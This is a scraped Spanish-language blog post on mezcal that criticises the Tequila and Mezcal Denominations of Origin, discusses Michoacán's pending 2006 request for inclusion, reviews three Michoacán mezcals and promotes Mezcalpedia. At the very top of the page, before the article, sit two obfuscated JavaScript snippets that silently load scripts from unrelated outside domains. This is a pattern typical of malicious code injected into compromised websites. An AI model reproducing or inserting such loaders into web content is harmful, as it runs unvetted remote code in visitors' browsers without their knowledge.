;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 82. Denominaciones de Origen: revisión obligada

82. Denominaciones de Origen: revisión obligada


Las Denominaciones de Origen (DO) son herramientas para impulsar el desarrollo rural que integran, o deberían de hacerlo, tradiciones culturales, cuidado del medio ambiente y la participación y decisión de quienes históricamente han hecho los productos protegidos. Parten de la premisa de que éstos deben tener un mayor valor en el mercado, pues poseen características únicas determinadas por su geografía, historia y cultura.
Cuando las DO se construyen sobre bases endebles, con contradicciones jurídicas, haciendo caso omiso del conocimiento geográfico, histórico y cultural, resultan no sólo inútiles, sino obstáculos para el desarrollo, violatorias de garantías constitucionales, generadoras de caos en el sistema jurídico y destructoras de los productos que deben proteger. Tal es el caso de la DO Tequila y la DO Mezcal.
Ilustra el caso del mezcal la solicitud hecha al Instituto Mexicano de la Propiedad Industrial en 2006 (impreso.milenio.com/node/8978734) para que Michoacán fuera incluido en la zona de DO. A la fecha, la autoridad competente no ha dado respuesta positiva o negativa.
Michoacán cuenta con una tradición mezcalera antigua, de la que mencionaré 3 mezcales de Abadiano, Jiquilpan -destilados en ollas de barro-, que nos encargaron saborear para que diéramos nuestra opinión sobre sus sabores y aromas: 1) mezcal de maguey Bruto y maguey Chato elaborado por Daniel Mandujano, 48.3º; 2) mezcal de maguey Chato y maguey Alto por Luis Vega, 50.5º; 3) mezcal de maguey Manso y maguey Bruto elaborado por Rodolfo González, 51.3º.
Quienes deseen conocer más sobre los mezcales tradicionales (MT) de Michoacán, visiten Mezcalpedia (mezcalpedia.com), sitio desarrollado por mezcólatras de Morelia. Allí recorrerán algunas regiones mezcaleras del estado y podrán participar en el Primer Concurso de fotografía digital, cuyo tema será “La tradición representada por los usos del maguey en México”. Los ganadores recibirán una canasta de MT michoacanos y un kit de regalos de la Mezcalpedia.

http://impreso.milenio.com/node/8985397

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *